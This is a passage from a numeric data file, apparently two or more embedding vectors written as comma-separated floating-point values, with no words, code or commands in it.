41,0.018102737,-0.015276878,-0.017871002,0.015260715,0.006217035,-0.019721776,0.032326788,0.01688063,0.028121496,-0.026832722,-0.02910474,0.0008256378,0.020848889,-0.025677402,-0.023879016,0.004700362,-0.028243644,-0.00029315593,0.00053645595,-0.0017405686,-0.0070238435,0.022948267,0.012078537,0.014668069,0.021168005,0.010387707,-0.008468119,0.018253373,0.00012514445,0.013593417,0.052825388,-0.011333986,0.0030288768,-0.014450547,-0.008659039,0.0025988847,0.011830625,0.00078613247,0.0023144956,-0.0030630725,0.017445233,-0.027229017,0.009220438,-0.010366753,-0.025313966,-0.00434921,0.007234557,0.00013112102,-0.019364433,0.0051322873,0.0045767347,0.00862475,0.00921992,-0.011266885,0.02538557,-0.03079879,-0.0073681558,-0.00951092,0.0005574169,0.011930247,0.010771404,-0.0048277196,-0.0036840383,-0.017558645,0.0010709614,-0.0029328046,0.013227258,0.0073777502,-0.0027343454,-0.010562068,0.011463417,0.00795007,0.0053753913,-0.013452955,-0.007482272,-0.008514296,0.025177265,0.010535987,0.0036233906,0.005261972,0.0071583786,0.01000734,-0.014013018,-0.02054609,-0.019316327,0.005680462,-0.016019661,-0.01383841,-0.004853561,0.005124951,0.008253001,-0.012291764,0.007798365,-0.016948996,0.008634719,0.009714225,0.0070342775,0.00896265,-0.003031749,-0.03028684,-0.015750729,-0.009596033,-0.01750503,-0.008464976,-0.016834296,0.0060732197,0.0005576813,0.0028778086,0.037761137,-0.018012432,-0.010778805,0.017864138,0.021347012,-0.0060850377,0.0058032344,0.02131504,0.013643725,0.008734732,0.032811042,-0.004268351,0.010474586,0.0029948568,0.0069778496,0.0031609782,-0.0072642164,-0.007173727,0.014297838,-0.0042069145,-0.014400172,0.00623862,-0.0008797429,0.0032815693,0.0099120075,0.010342891,0.0052257446,-0.020150827,0.03310902,-0.034280013,-0.015932713,-0.0068392805,0.032151654,-0.033374455,0.00028901495,-0.00512644,-0.029511025,0.006844621,-0.013954287,-0.015194557,-0.004887609,-0.02710895,0.014802598,-0.0058232215,0.005679815,-0.012722613,-0.022729054,-0.009952957,-0.10979208,-0.008965821,0.019702591,0.0058828495,0.034304544,0.0109462915,-0.015887517,-0.0044730445,-0.015057837,0.0133043155,0.018778287,-0.011858703,-0.007708734,-0.002096113,0.013020225,-0.030529514,-0.013783806,-0.009404833,0.0032393283,-0.038094327,-0.015230128,0.0070710443,-0.02021766,-0.011560274,0.021077154,-0.008898313,-0.0026133256,-0.004555206,-0.010207578,0.0020138475,0.0077227084,-0.015606279,0.0058985837,-0.005504341,-0.0053274147,0.011059662,0.0046010283,-0.006053462,-0.007704256,-0.023175903,-0.0052240836,-0.0022036664,0.009901206,0.010507441,-0.014504439,0.010546164,-0.021485057,0.014981212,0.0020346176,0.0025472085,0.0022627353,0.014570779,-0.0021842283,0.014610826,-0.0083312215,0.00903704,0.004007969,0.003654027,0.01765585,0.004743428,-0.0026306773,0.004785605,0.011932887,-0.017420331,-0.008078444,0.0013765272,-0.0027722884,0.022229267,-0.0008583812,-0.008971932,0.006249062,-0.03813127,-0.0023859488,-0.015627822,-0.017740209,-0.011529924,-0.0041277884,-0.02952412,-0.010565412,0.0036799463,0.044996727,-0.0073552127,0.008183675,-0.0023348704,-0.0023027929,-0.0004553159,0.0055600083,0.0038238636,0.021411907,0.0038024662,-0.007535025,-0.012558152,0.017804932,0.007921673,0.012145537,-0.0041583516,-0.012383576,0.009835091,-0.010733735,0.010216565,0.0067932326,0.011403948,-0.0029525333,0.01293549,-0.02076068,-0.0007150118,-0.00077642297,-0.013468552,-0.006462028,-0.011849999,-0.007338252,0.018600734,0.042853765,0.030703934,0.017962644,0.011111714,0.0025515044,0.02063262,0.01015149,-0.017055815,-0.019082421,-0.0077178734,-0.008308533,0.03457203,0.015340453,-0.02482538,0.008891012,-0.014441622,-0.018400356,0.0070092184,-0.023759337,0.030299623,0.016480723,0.006763437,0.000057742775,-0.0026592128,-0.036782008,0.0071079144,0.01479542,0.01965971,-0.008245889,-0.019020224,0.008103573,-0.002302282,-0.027406286,0.019543136,-0.033479955,-0.0010965617,0.017304208,-0.01910229,-0.006930193,0.011935463,0.0041226447,0.0058022407,-0.0003069147,0.0064951824,0.009105535,0.0025462427,-0.020736676,0.015286033,0.002266117,0.027801195,-0.0030349032,-0.015302486,-0.02696089,-0.00048512785,0.00573911,-0.011422704,-0.006192406,-0.0066973194,-0.0011382818,-0.024458531,0.002732968,-0.0068492824,-0.0063489988,0.0016604894,0.013759579,0.037093032,-0.018499343,-0.00069054356,-0.0020594886,-0.0065549016,-0.014581101,0.0011825303,-0.007879242,-0.01223981,-0.0042636166,0.006877989,0.011414094,-0.0019614638,-0.0123071605,0.0006926771,-0.002737175,-0.0042700893,-0.004348284,-0.004537207,0.018600322,0.005755498,-0.0072337906,0.0016054163,-0.020304387,0.01857232,-0.014905594,0.017491434,0.03088866,0.013606038,-0.012701855,0.012395763,-0.034573045,-0.01775016,-0.01668711,0.02266546,0.029534156,0.14504181,-0.0025401847,-0.017230205,-0.0024795998,0.0019079674,-0.012001677,0.0061219973,-0.0029693355,0.0050300546,-0.00393654,0.026323128,-0.0092520565,0.02340803,-0.018957231,-0.0051856767,0.024738194,0.0048839594,-0.0069642835,0.009184688,0.014350494,0.021963453,-0.008771173,-0.008539912,-0.04655051,-0.010932519,-0.053980127,0.034930985,-0.00064153376,-0.003469302,0.038936134,0.006243733,-0.013620308,0.012366494,0.0065791723,-0.0013123096,0.032138087,0.0032259102,-0.017461633,0.0009902759,-0.0022081814,0.012680537,-0.0056328205,0.0043644914,-0.0343979,-0.016912643,-0.017511962,0.016298188,-0.0024593067,-0.007411553,-0.019634591,0.009846418,0.00025998292,0.0030899437,0.009927314,0.016101161,-0.0054791546,0.008148097,0.005093157,0.013939737,-0.023868682,-0.0016854223,0.008797395,0.0046880133,-0.009766185,0.006055836,0.005908715,-0.012801582,-0.011311586,0.0042509637,-0.0123979105,0.029041298,-0.0043097604,-0.005565989,-0.0009004009,0.013381156,0.010117933,-0.008407211,-0.0056083766,0.0040240195,-0.014558989,0.014617945,-0.0019215335,0.007902786,0.005978064,0.013141717,-0.015687076,-0.023728073,0.00689542,0.0046917764,-0.0044830805,-0.02300542,0.037058212,0.023615219,0.005052668,-0.0068738675,0.005972524,0.0077879396,-0.0009346405,-0.009343388,-0.014155527,-0.022355855,-0.020325363,-0.0035263097,0.014199232,0.004808061,0.001676502,0.01074896,0.025769042,-0.01664754,0.005547376,0.000051033825,0.008619015,0.0013675073,0.011425668,0.0013635299,0.04603211,-0.0025898966,-0.011935985,0.02024021,-0.022685409,-0.009842801,0.004883544,0.014265711,0.022834543,0.0017705905,0.0095295375,-0.015218296,-0.009553669,-0.0027456055,0.006197216,0.0030027728,-0.02215771,0.004566348,0.019399844,-0.002385043,-0.018420788,0.025626348,-0.002215144,0.020967478,0.0010121801,0.008336844,-0.0018645261,-0.0021997017,-0.018719614,0.024239648,-0.021558724,0.0068075713,-0.014633551,-0.0040828693,0.008533011,0.009117069,0.009622301,-0.008660506,0.0019346512,0.0025281117,-0.012124223,-0.013665829,-0.018893596,-0.0063026138,-0.008338812,0.015354658,0.00043068785,0.0074887513,-0.047409505,0.049855348,0.0013667495,0.02519985,0.011739894,0.0036191195,0.0035716556,-0.005304772,-0.023032458,0.013552208,-0.0084223505,0.009370424,0.0115784565,0.018499032,-0.0044779363,-0.013836154,-0.008335203,0.014127036,0.00027287067,-0.0032490466,-0.017863194,0.01967527,-0.015701465,-0.00025337408,0.010571873,-0.010145767,0.014374758,-0.007881663,-0.00444051,-0.0040370673,0.019603984,0.0047757835,0.009372895,-0.002163121,0.021756714,-0.020992046,-0.03723866,0.012808732,-0.0054219337,0.018950729,-0.013349751,0.02412568,-0.03280915,0.003991938,-0.011535626,-0.00052943826,0.003285561,0.015629403,0.008151179,0.006574142,-0.04274197,0.0069796657,0.01247942,-0.011861894,-0.027421055,-0.013079176,0.018698167,-0.00084597926,-0.01839979,-0.013098081,0.005968499,0.02343297,0.005890558,0.0020328355,0.009765225,0.0113922935,-0.017261911,-0.024768261,0.00079283776,0.0025310589,-0.0019272807,-0.017702276,-0.010496962,0.038649935,0.016506875,0.014836361,0.0061361203,-0.0059787356,0.012911891,0.013322049,0.013315064,-0.014222536,-0.0039658393,-0.017589716,-0.021076053,0.001867017,-0.0018162506,-0.0226527,0.011515823,0.005527206,-0.011992012,-0.042168994,-0.011124832,0.013200188,0.019300839,0.00025095412,-0.003518643,0.012081103,0.022618547,-0.0039980854,0.027425122,-0.010560882,-0.0060775825,0.0059271883,0.001755838,-0.0012595777,-0.0033729032,0.008835941,0.011813961,-0.009049717,0.02920491,-0.0027199914,-0.0041915667,-0.0015478467,-0.005299832,0.01546708,-0.004051289,0.020308908,-0.02274013,0.009453564,0.00041713205,0.0030149338,0.0076111797,-0.0005513392,0.00879352,0.017564317,-0.05116827,-0.014477164,0.033022538,0.003015329,-0.03065836,0.02445467,-0.012590923,-0.01636101,-0.02120832,0.006729442,0.009755043,-0.0032221368,-0.040013116,-0.0017038811,0.00702829,-0.013759735,-0.005845274,0.016739944,0.0038763417,-0.003219408,0.025479324,-0.008322415,0.0013069867,-0.010944829,0.012983655,0.0000066992457,-0.007402876,0.0068947314,0.01354873,0.0110242935,-0.00085053535,0.020759191,-0.031021636,0.0019956192,0.020552326,0.003948566,0.0056276093,-0.007904995,-0.029025575,-0.024976706,-0.0042405403,-0.0027212668,-0.011593878,0.017168865,-0.027071077,-0.0009844205,0.017777508,-0.012154763,0.14339177,-0.014622688,-0.021956721,0.0102179665,-0.00424125,0.0023356385,0.001421841,0.030701432,0.0099448515,0.016314121,0.014784337,-0.013527454,0.0025952598,0.021743175,-0.024670018,-0.009041445,0.021240948,0.1295467,0.00020041862,0.020743838,0.021301163,0.007497593,0.0026430113,0.004822159,0.025840444,-0.06702897,-0.010175487,-0.020931406,0.009332843,-0.0021422256,-0.04248995,0.027892318,0.0019220772,-0.0148871625,-0.019435575,0.016619302,0.00031346097,-0.012272586,-0.006196414,-0.015734313,0.012625209,0.000050668987,-0.019140037,0.004840624,-0.008367349,0.006532428,-0.039415244,0.005940534,0.007995089,0.023806471,-0.013165711,-0.02279638,0.015056838,0.0056794896,0.014621736,0.011621941,-0.0070085945,0.0028147472,-0.02529366,0.0072122137,-0.008414008,0.014955406,0.00096303504,0.029846605,0.0029871503,-0.017146708,-0.01076714,0.013789025,-0.0051170522,0.015988825,0.03275725,0.01857204,-0.028092617,0.010615435,0.024110131,-0.00570384,-0.014325439,0.0010969614,0.010654133,0.0025047453,0.030872418,0.0025335015,-0.01990424,0.02055559,0.017545851,0.031124791,0.0011197105,-0.020255212,0.0186798,-0.0041158395,-0.016326874,0.0118015865,-0.02139314,0.0019558908,-0.011324411,0.02952006,-0.011295297,-0.0010876259,0.0022082103,-0.0153026525,-0.015532294,0.024971414,0.013947552,-0.004246728,-0.0052644205,0.0072724707,0.00007119005,-0.03568481,0.0026960887,0.019681413,0.019379387,-0.01278154,0.009186966,0.023853637,-0.006828487,-0.010747338,-0.00015908641,-0.0054089525,-0.007948741,0.0138521325,0.0012731928,0.008022066,0.0028980882,-0.0026581432,-0.012044836,-0.014493581,0.020484751,0.008648326,-0.0138668185,-0.0050142896,-0.002269657,-0.0063526323,0.017615754,0.051978357,-0.0058098477,-0.016524194,0.021110272,-0.023472672,-0.0287796,0.006330072,-0.035320684,0.005208082,0.0024362495,-0.0012184866,-0.009178456,-0.008410372,0.016639823,-0.020330897],[0.0039626216,0.0048538954,0.003432534,0.0035930555,0.016725408,-0.014958656,-0.010943,-0.0013512995,-0.010003994,-0.013957801,-0.0032298663,0.010632587,-0.012438368,-0.00040459645,0.0010317436,-0.0034461266,0.013100359,-0.0137141375,-0.0018134083,-0.0138363335,0.01037835,0.0025893785,-0.005632983,0.013624644,0.011634731,-0.012619195,-0.01713625,-0.014701096,-0.010337193,0.009865415,0.02443877,0.01790256,-0.0018218908,-0.007311647,-0.0047744066,-0.004194853,-0.009166838,-0.0030896123,0.0023011018,-0.0059276433,-0.000704074,0.01464184,0.01797628,-0.006092967,-0.014334774,-0.002258965,-0.0034957463,0.007087188,-0.038010277,0.015227062,0.004717608,-0.020296011,-0.03235429,0.031100305,-0.02231746,0.010667481,-0.0013844727,-0.021185635,0.016108599,-0.003243151,-0.00714266,0.014637763,-0.025862128,-0.02964204,0.00264659,-0.028314551,0.0119777825,-0.006262325,0.0014008932,-0.019374344,-0.019317796,-0.0005956218,0.016820598,0.01834,-0.00009652737,0.024495333,0.012283777,-0.02469984,-0.021434786,0.032869123,-0.005549485,-0.006990222,-0.0051661567,-0.0070239413,0.016460441,0.004266927,-0.008225453,-0.010059149,-0.019044414,-0.02812548,-0.019361448,0.018921338,0.0040968764,0.007495859,-0.016174927,0.017637396,0.015683752,0.0072371573,0.0029331949,-0.008349282,-0.002905326,-0.013535544,-0.024548752,0.009016802,0.0027393908,-0.0019513904,-0.0079962835,-0.008480126,-0.010462113,-0.008738417,0.011940038,0.010978897,0.009898689,0.0031868424,0.031601734,-0.008792545,-0.0026809543,0.013922937,-0.007497959,-0.015339237,-0.010186827,0.023052344,0.016065668,-0.0024442046,-0.0024528375,-0.0011909258,-0.012265083,0.0062359516,0.012803846,0.008469491,-0.009699826,0.007084999,0.011813283,-0.010942904,-0.02123344,0.007873527,0.0012098468,-0.012205973,0.008830325,-0.023626618,-0.0052260123,0.0012544082,0.004405647,-0.0020338653,0.01083582,0.01955436,-0.005088021,0.008296063,0.0053795176,-0.008265175,0.0046267505,-0.0028984216,0.0016633698,-0.025907053,-0.006526552,0.0045712884,0.0029032892,-0.001953183,-0.006676546,0.017758183,-0.024857573,0.0119854305,0.019272603,-0.025470354,-0.0049289707,-0.027813712,0.011344324,0.0032525002,-0.021957265,0.015849425,0.022404717,0.018582148,0.0055705714,0.013887269,0.023732001,0.019564098,0.0052987128,-0.028050419,-0.006615852,-0.017741341,0.008436956,0.011432778,0.01762892,0.004762408,0.009618936,0.010886648,0.009181262,-0.009697224,-0.02635983,-0.00041182156,-0.000053599033,-0.008809618,-0.015659885,-0.0025542835,0.0033109533,-0.025201116,-0.019347595,0.09504323,-0.0011334085,0.0021823477,-0.013808065,0.01826978,-0.0032744291,-0.018421955,-0.008726894,-0.01810185,-0.0039462545,-0.0075492575,0.0018572481,0.0065189158,0.023113176,-0.009471345,-0.009449095,0.005766412,0.015662998,-0.059252955,0.008326097,0.028529918,0.0017052725,0.012432792,-0.004189225,0.0063163014,0.019536233,-0.022583924,-0.02696006,-0.019873975,0.0014528878,-0.00211993,0.009844185,-0.036998313,0.010747505,0.0038145983,-0.014048127,-0.0069223573,0.016908241,-0.015007041,0.014413572,-0.01359584,0.012189461,0.00893906,0.004050899,-0.010718594,0.017795824,0.05108223,-0.025650948,-0.02683219,0.024287565,0.016149359,0.0031681545,0.040248178,0.023673898,-0.011851377,0.015688973,0.016283467,-0.007989533,-0.0119883865,0.008637913,-0.006623271,0.019544747,0.004475356,0.02998392,0.025505612,0.002315049,0.024562804,0.04993912,0.017705739,0.0058696023,-0.034450736,-0.0053376965,-0.028708793,-0.025566917,0.009940139,-0.011369564,0.0004985803,-0.0034677768,-0.0016928195,0.014386776,0.0011609968,-0.00083331653,0.008415685,0.002831611,-0.0025322305,-0.008920655,-0.016187007,-0.012345349,0.010590172,0.0065772682,0.0024290353,0.03191454,0.0031239842,0.005325612,-0.011661919,0.0040610004,0.012840138,-0.01633901,-0.014436797,-0.00015706304,0.004667963,0.0115228575,-0.011403554,0.012488402,-0.019400124,0.034743592,0.0049264436,-0.015904428,0.0057541747,0.0024794452,0.039063096,-0.02910827,-0.0073043583,-0.012671158,-0.0105754165,-0.03693742,-0.017539524,0.012205721,0.0071417117,0.014341511,-0.010132213,-0.015686227,-0.0041150646,0.026730899,-0.028383875,0.0070695374,-0.02565967,-0.011800344,-0.0040253308,0.00824112,0.0001805036,-0.008043331,0.006865881,-0.006473588,0.009766269,0.020191861,0.006863259,-0.009780752,0.034198374,-0.016545491,0.022083856,-0.00061294093,0.0038788603,-0.017598085,-0.006357132,-0.0049636844,0.019932197,-0.00024536013,-0.017466068,0.022244256,-0.0039720815,0.027181964,0.019994864,0.017289098,0.012547221,0.0038234973,-0.014257829,-0.00037487826,0.019010091,-0.019628763,-0.02322809,-0.0021611846,-0.012179744,0.0032786021,-0.027075734,-0.013039637,0.0009343735,0.057818722,-0.010913303,-0.008748217,0.007309333,-0.023330005,-0.00016017778,0.01294417,0.01110861,0.007981298,0.0032927322,-0.0047876225,-0.03742238,0.0068252296,0.009946086,-0.0018943765,0.0048836963,-0.017377673,-0.013332485,-0.030015958,-0.013694109,0.023785809,-0.005405971,-0.011400302,0.023330146,0.008159176,0.0035497986,-0.006523438,0.011255305,0.0064450675,-0.013769694,0.006491489,0.001387676,-0.0012195901,-0.008136527,-0.044741586,0.020334907,-0.012050698,0.011006812,0.0026779706,-0.01709397,0.0014937824,0.0150319915,0.012415985,-0.032441776,-0.018870315,0.024372928,0.00042200924,-0.0035305761,-0.011206965,0.011600299,0.004445043,0.019804193,-0.013216138,0.013371691,0.0045194677,0.012763674,0.018496716,-0.050398856,0.01796304,0.0115372725,0.021416642,0.023582596,-0.0059058242,0.007941389,-0.001010923,0.027286338,-0.006428774,0.0033256083,0.0028582166,0.0070220106,-0.0063587665,-0.0006174101,0.0014404396,-0.005249472,-0.00601422,0.010586099,0.020303357,0.006274637,-0.00083737064,0.021297503,0.010594283,-0.0019167567,0.0031543924,-0.014888936,-0.014425681,0.0051166336,0.0036389125,0.03316829,0.011606007,-0.008428127,-0.018157488,0.009003409,0.0043187523,-0.015414095,0.041624762,0.018655183,0.019337695,0.026329648,-0.00013338681,-0.0056943265,0.008161539,-0.006521876,-0.002915042,-0.018214438,0.0017846078,0.002674588,0.0068291994,-0.0033129132,0.0036707101,0.010504594,-0.004955603,-0.0013136527,0.0130138965,-0.008566282,-0.003107867,-0.01697252,-0.011776435,-0.01367592,-0.0037772374,-0.010698423,0.028157787,-0.0047642435,0.0069864024,0.006407922,-0.007035684,-0.0021986421,-0.0019582957,-0.0056263395,-0.002910531,0.006331212,-0.004202947,0.023840025,0.013216774,-0.0435528,0.0015322483,-0.0032265824,-0.01693093,-0.03912151,0.020500034,-0.00291685,0.018601678,0.009531957,0.038649883,0.020097395,0.0041649714,0.019922787,0.031718258,0.004586861,-0.029005188,-0.003157539,-0.013083543,-0.00097293325,-0.008575478,0.0070465216,-0.0035900115,0.0036253328,-0.0034988043,-0.009647349,-0.03262541,0.010257382,0.023882648,-0.02597869,0.0067906776,-0.0006956391,0.015451801,0.018655479,0.024643414,0.043042466,-0.0035729806,-0.03411205,-0.0063787834,0.0062982594,0.017798413,0.0133346785,-0.0025882549,-0.022026734,0.027333532,-0.0058509405,0.01933534,0.015655836,0.03097224,-0.04452889,0.0032784923,0.017139731,0.0072224485,-0.011376597,-0.0009825593,0.007584403,-0.010756626,-0.0037328342,-0.022340462,0.00044774738,0.0038632422,0.030350389,-0.0013314057,-0.022336943,-0.003149393,-0.01949664,-0.008126421,0.012348999,-0.008750865,0.008410298,0.0027923295,0.018112248,-0.004322832,-0.009874511,0.009647468,-0.008712489,0.010234906,-0.008172275,-0.0017784585,0.000040019706,-0.016203934,-0.0038251472,0.020532597,0.011240062,-0.007003884,-0.0064762565,0.030491026,0.012613183,0.021756452,-0.0076057757,-0.00041735495,0.0028581829,0.0060254736,-0.012929391,0.003039849,-0.016830789,0.0068881908,-0.029065479,-0.025482038,-0.009071963,-0.003345379,0.001059413,-0.01706282,-0.0067131515,-0.033399522,0.01326266,0.017294504,-0.0027075766,-0.018175887,0.0051730094,-0.008540125,-0.004892819,0.023722855,0.00028973288,-0.02071813,0.0066696033,0.008378527,-0.007033751,-0.016943341,0.037753504,-0.0001957382,0.0012551212,-0.016684493,0.0061821737,-0.016497007,0.0018839011,-0.0170289,0.013803118,0.024680534,0.0050365278,0.008533948,0.01130892,-0.024802994,-0.011743714,0.021096395,-0.021422343,-0.008260897,-0.007304178,0.011367924,-0.022025282,-0.010949572,0.020026388,0.0022062438,-0.012362107,-0.013519788,0.0048522055,-0.05617064,-0.005666927,0.009390832,0.013277837,0.012555154,0.06492455,0.02039557,0.007949329,-0.0055166497,-0.010412212,-0.012857804,-0.007770944,0.016310364,-0.0003290849,0.0047713076,-0.018071009,-0.030472428,-0.028310688,-0.022492047,-0.01774452,-0.011082457,0.039629653,0.0041735927,0.009617187,0.0036976847,-0.01952735,-0.016798878,0.00547447,-0.005505742,-0.032895893,0.0017301162,0.00551047,-0.0018778155,-0.0037203056,-0.019899484,-0.0042756903,-0.0040533845,-0.0022577702,-0.009604944,0.0059363917,-0.0057645426,-0.0030524214,-0.019239338,0.01666763,-0.018576073,0.043522947,-0.007986765,0.011754037,-0.008895782,0.036323145,0.009388156,0.010864175,-0.006483768,0.022700086,-0.017760275,0.01577292,-0.00739061,0.023903629,-0.002443967,0.0027632022,-0.020378187,0.027457299,0.001896024,-0.015013122,0.007904738,0.004233722,0.042607952,0.012973607,0.03422433,0.004507717,0.031136319,0.012460388,0.017476544,0.004749497,0.024131343,0.019425275,0.013011286,-0.0007317248,-0.0075932504,0.002563497,-0.026184201,-0.018541083,-0.016967624,0.015864847,0.026357379,0.009259109,0.0054299035,0.0065049184,0.016062884,0.005708592,-0.017395135,0.0050048972,0.003359198,0.0008279178,-0.0089584645,-0.013882946,0.0019953058,-0.021676218,-0.011679514,0.0043386575,0.022553535,-0.005778515,-0.016357267,-0.0044102916,0.00831388,0.002704417,-0.026388763,-0.024012353,0.0033748879,0.024127604,-0.0041926387,0.011666864,0.017683703,-0.011952962,0.0026360345,0.026990427,-0.019292016,-0.01921257,-0.017084112,-0.006270334,0.014529911,0.0059830057,0.022677476,-0.006358083,-0.021352796,0.0073076044,0.0011453675,0.00793347,-0.004156825,-0.00832843,0.0111328745,-0.0021322041,-0.01213662,0.0028472291,-0.025375841,-0.013996517,-0.0017795906,-0.028099358,0.0001512527,-0.021382567,0.0058386396,-0.0030229136,0.029067306,-0.0027551325,0.03654138,0.032759026,0.0044847853,0.0010325289,-0.00083350384,0.019985626,0.028096903,0.025557006,-0.006600803,-0.02534396,-0.009458911,-0.0063566715,-0.013422914,0.0029435796,-0.0022487114,-0.025002237,-0.025394116,-0.014007395,0.011275239,-0.0213494,-0.0003645926,-0.010945854,-0.002273844,0.02050424,0.0010011819,0.01464624,0.0060515874,-0.0036229445,0.0018755156,-0.02239175,0.0062895594,-0.041020475,-0.011004876,0.019870864,-0.028743736,0.03353063,0.0031872536,-0.03145294,-0.02317396,-0.018862996,0.005724494,-0.017471561,0.023168657,0.01870064,-0.009867703,-0.009784444,0.009168921,-0.0030459398,0.02227873,-0.023032276,0.0039089452,-0.0011252128,-0.0156065645,0.030614045,0.025682319,-0.0050342977,-0.008155665,0.009191216,0.00044042588,0.024079856,-0.008972915,-0.0028869512,-0.0029068047,0.0062414696,-0.021599425,-0.021709038,0.020561067,0.0065150093,0.00028896818,0.018051207,0.0025364119,0.021442372,-0.010719385,-0.038377892,-0.017898068,0.002000904,0.012793649,0.0023277232,0.009015758,-0.0028104205,0.007069625,0.0042138426,-0.02721277,0.019852119,-0.004718251,0.022229742,0.00544722,-0.01589029,-0.026872126,-0.015297044,-0.0018639328,0.010798138,0.0011051912,0.003624098,-0.014699483,0.0067325183,0.018641643,-0.006071868,-0.01715854,0.017974237,-0.026270518,-0.0014273417,0.0010056352,-0.000466812,-0.0063395696,-0.0027364644,0.008971354,-0.022867072,-0.008770313,-0.013770529,-0.02258818,0.033818703,0.0028284201,0.0053445287,-0.0037885238,0.004247146,0.024443539,-0.012430607,0.013309254,-0.0036956575,0.023162358,-0.02395745,0.0035942837,0.01771639,-0.01270921,0.00037674033,0.004189143,-0.0038073175,0.01015913,0.01587053,-0.019797932,-0.0012557637,0.015930617,0.007663775,0.013929351,0.0039316355,0.0056336815,0.022714036,0.028281271,-0.013620782,0.010746168,-0.012956478,-0.023429371,-0.0073064207,0.001063997,-0.005605135,-0.020143472,-0.010328141,0.018526277,-0.0065853302,-0.015525662,-0.0067346585,-0.0692262,0.024864431,-0.024371712,-0.010491463,0.0034908662,0.018186364,0.0014020788,0.009342679,0.038244605,-0.0094692325,0.0020454496,-0.006821289,0.0066366857,0.0025236427,-0.0023495043,-0.008843514,-0.04523567,-0.007102696,0.018566433,0.0048406525,-0.016346427,0.0016567959,0.016150845,0.008198129,0.05520985,-0.0067796004,-0.0052507333,-0.0056474754,-0.03884687,0.004454664,0.00005919789,0.026387732,-0.006487872,0.0035303384,-0.020255528,0.0054855156,0.004407189,0.002173792,-0.0034978397,0.010574451,-0.015439567,-0.0063797506,0.00015638093,0.02053505,-0.01376157,-0.027502405,-0.0014646151,-0.0021974186,0.004761311,-0.015127587,0.030846393,0.0004732453,0.0030395591,0.0038281356,-0.027044797,0.033374228,-0.012209935,-0.0050128247,-0.0024258916,0.014691076,0.007516732,-0.010977443,0.035552625,0.014163654,-0.034714233,-0.010962226,-0.000510768,0.04440271,0.010781198,-0.039287202,0.004893934,-0.019622486,0.007513353,-0.019764226,-0.03370319,0.023579093,-0.015108263,-0.008170078,-0.00088215363,-0.013478031,-0.019399857,0.02046702,-0.01872362,0.010473823,-0.009344212,0.0036449626,-0.012893047,0.0022876684,0.011390324,-0.0013794933,0.000863194,-0.0004342743,0.011712759,0.015499822,0.002061514,0.042097103,-0.0044018743,0.0073145465,-0.011294504,0.0019018265,0.014676325,-0.008271265,-0.014939197,0.061548878,0.01962298,0.001545013,0.011060139,0.0030199743,0.033953734,0.022381555,-0.0052600233,-0.005519852,-0.0088157905,0.0058386554,0.008021139,0.006117245,-0.006786179,0.018895116,-0.0047434405,0.024931367,-0.0034531965,-0.010839107,0.0051123216,0.009318951,-0.015367452,0.007829099,0.009253227,-0.003344211,-0.028441243,-0.021365672,0.014924378,0.023060286,-0.006281552,0.0071475077,0.00823533,0.0062481426,-0.0021559128,-0.004955886,-0.020736465,-0.004905815,-0.02566712,0.013513322,0.0003379653,0.015128176,-0.01709899,-0.014910709,-0.016071247,0.0049157697,0.012207936,-0.005773054,-0.0070093167,0.024000818,0.0047689294,0.0027902557,0.013970398,0.00038710047,0.0128858145,-0.01665991,-0.016171785,0.020242523,-0.01142857,-0.003192072,0.013173054,0.0039901584,-0.036843613,-0.0006404162,-0.01300954,-0.00259658,-0.019621896,-0.008307772,0.00354777,0.012866789,-0.015246206,0.031999215,0.016708713,-0.034128144,0.028868733,0.007037098,-0.0075899684,0.013985411,-0.007408685,0.03318611,0.012860153,-0.005237494,0.007829848,-0.01604427,-0.018322384,-0.017222678,-0.013790571,-0.02730123,-0.016448257,0.004869144,0.0051562996,0.0023937854,-0.017611152,0.03302359,0.006862823,0.024447132,0.007865622,-0.0045326543,0.0008275817,0.014788651,0.005024035,-0.0005918003,-0.024463704,0.029601749,0.026516106,-0.044984303,-0.021938814,-0.010406783,-0.021507587,-0.014493709,0.0010419752,0.011769935,-0.016174868,-0.014506623,-0.021045176,0.0029594619,0.012763119,-0.0022255774,0.013365312,0.011331747,0.00985075,-0.0056874156,-0.002661653,-0.021213474,-0.005175214,0.011938307,-0.010774514,-0.017946633,0.035984036,0.0021098156,0.0153719615,0.017304726,-0.012078152,-0.013560653,0.0014935534,-0.0007355789,-0.02015254,0.006260273,-0.005263704,-0.008000581,0.0040957355,-0.0040815566,-0.021924589,0.02769187,0.017026585,0.00043388197,0.011207182,0.01707333,0.013841247,0.01233064,0.012270248,-0.008282452,-0.0023554822,-0.012218831,-0.009700257,-0.008718652,-0.01479306,-0.009101171,-0.02915391,-0.016535584,-0.0027764263,-0.007539948,-0.011124888,-0.0005409919,0.007672365,0.0074578603,0.028270014,-0.00059815164,-0.0017726428,0.0040408643,0.015995875,0.012867803,-0.0018338196,0.010329729,-0.0057968223,-0.008483777,0.010963143,-0.006044624,0.0026316193,-0.004979661,0.020378616,-0.014563211,0.018635988,0.002850677,0.012756734,-0.016385527,0.03623734,-0.0122552,-0.010598716,-0.025989003,-0.004815867,0.005376034,0.02641425,-0.006238764,0.005898031,0.011916679,-0.001678266,-0.014597832,0.10049984,-0.017560227,0.0051073134,-0.027937455,0.01748164,-0.012192652,0.023180056,-0.010877627,-0.00084472523,-0.0044129426,-0.036863416,-0.010864901,-0.017605113,-0.01927437,0.025695467,-0.004304968,-0.0016567336,0.027165033,0.004332062,0.0009517034,0.010332179,0.004474608,-0.012089634,0.0059081786,0.006827661,0.026899485,0.016780253,-0.015505099,-0.002169328,-0.003060341,-0.007548939,-0.024509383,0.02634637,0.0059701526,-0.0037406366,-0.0026877453,0.0034098865,-0.02279873,-0.011647665,0.015951764,-0.0010254293,-0.0034503993,0.03853227,0.0005779444,0.015260136,-0.016653825,-0.01605264,0.012548515,0.0032970067,-0.014140155,0.0064702523,0.01667759,-0.013615921,0.023925591,-0.023477122,0.0015531634,-0.014311748,0.017767888,0.025539892,-0.012835054,0.012705053,0.034129154,-0.0032406996,-0.0028315089,0.006008035,-0.008874823,-0.0065440102,0.00672561,0.017786488,-0.028621413,0.02072069,-0.023205467,0.01961866,-0.0046602986,-0.009377632,0.014971598,0.01635657,-0.0089705065,-0.023118306,-0.025529496,-0.02064219,0.007318196,0.039788153,0.008395798,0.018775517,0.01068236,0.015940059,0.020489354,0.021716839,-0.014162545,0.04262141,0.0013583432,-0.0026679721,0.026365858,0.014977256,0.02116216,-0.0068726805,-0.000694837,-0.028878449,0.01805958,0.0021559063,0.003368002,0.011886187,-0.0122895315,0.01173198,-0.011833482,0.022365922,-0.0345949,0.0027136684,0.036450896,0.012065879,0.013366059,0.0060605113,0.0062680254,-0.0019995738,-0.007352124,0.01902477,-0.020644283,0.01110219,